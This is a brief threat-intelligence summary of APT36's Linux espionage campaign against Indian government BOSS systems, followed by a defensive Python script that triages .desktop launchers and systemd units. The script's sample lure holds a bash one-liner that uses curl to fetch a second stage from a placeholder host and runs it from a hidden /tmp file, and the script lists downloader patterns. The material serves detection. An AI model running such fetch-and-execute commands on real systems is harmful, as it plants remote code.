A powerful threat actor known as APT36 has advanced its cyberattack techniques, now focusing on Linux-based systems used by the Indian government. The campaign involves sophisticated malware that targets Bharat Operating System Solutions (BOSS) Linux environments to maintain covert access and espionage capabilities. #APT36 #BOSSLinux #IndianGovernment
Key points
- APT36 has shifted from targeting Windows to developing tools for Linux environments used by Indian government sectors.
- The attacker delivers malware through spear-phishing emails with a disguised Linux shortcut (.desktop) file.
- The malware uses a multi-stage stealthy process, including downloading a remote RAT and establishing persistence with systemd.
- The core payload, swcbc, is a cross-platform Python-based RAT with espionage features like file exfiltration and screen capture.
- The campaign highlights APT36's increasing technical mastery and focus on indigenous platforms for strategic espionage.
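As a defensive illustration added here (not code from the article or from the campaign's tooling), the Python triage below parses a constructed .desktop lure and a constructed systemd user unit and flags the traits the key points describe: a document-named launcher whose Exec line runs a shell one-liner that fetches a second stage, and a unit that persists an interpreter from a hidden path. The sample contents, heuristics and names are assumptions for the example.

```python
import re
from configparser import ConfigParser

# Constructed samples for this example; not artefacts from the campaign.
SAMPLE_DESKTOP = """[Desktop Entry]
Type=Application
Name=Meeting_Agenda.pdf
Icon=application-pdf
Terminal=false
Exec=bash -c "curl -s http://example.invalid/stage2 -o /tmp/.s; python3 /tmp/.s"
"""
SAMPLE_UNIT = """[Service]
ExecStart=/usr/bin/python3 /home/user/.config/.updater.py
"""

SHELL_WRAP = re.compile(r"\b(sh|bash|dash)\s+-c\b")
FETCH_OR_INTERP = re.compile(r"\b(curl|wget|python3?|perl|base64)\b")
HIDDEN_PATH = re.compile(r"(/home/[^/\s]+|/tmp)/\.[^\s]+")
DOC_LIKE_NAME = re.compile(r"\.(pdf|docx?|xlsx?|pptx?)$", re.IGNORECASE)

def exec_findings(cmd: str) -> list[str]:
    """Heuristics applied to one command line (Exec= or ExecStart=)."""
    found = []
    if SHELL_WRAP.search(cmd):
        found.append("shell -c one-liner")
    if FETCH_OR_INTERP.search(cmd):
        found.append("downloader or interpreter")
    if HIDDEN_PATH.search(cmd):
        found.append("hidden path in home or /tmp")
    return found

def _parse(text: str) -> ConfigParser:
    # Both formats are INI-like; strict=False tolerates repeated keys in units.
    cp = ConfigParser(interpolation=None, strict=False)
    cp.read_string(text)
    return cp

def triage_desktop_entry(text: str) -> list[str]:
    """Flag a .desktop launcher that poses as a document but runs a dropper."""
    entry = _parse(text)["Desktop Entry"]
    found = exec_findings(entry.get("Exec", ""))
    if DOC_LIKE_NAME.search(entry.get("Name", "")):
        found.append("name mimics a document")
    if found and entry.get("Terminal", "true").lower() == "false":
        found.append("Terminal=false hides the command window")
    return found

def triage_systemd_unit(text: str) -> list[str]:
    """Flag a user-level unit whose ExecStart looks like a persisted implant."""
    return exec_findings(_parse(text)["Service"].get("ExecStart", ""))
```

Run it over ~/.local/share/applications, ~/Desktop and ~/.config/systemd/user to surface launchers and units worth a manual look; the heuristics are a triage aid, not a verdict.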
Read More: https://securityonline.info/the-boss-breach-apt36-pivots-to-linux-espionage-with-silent-shortcuts/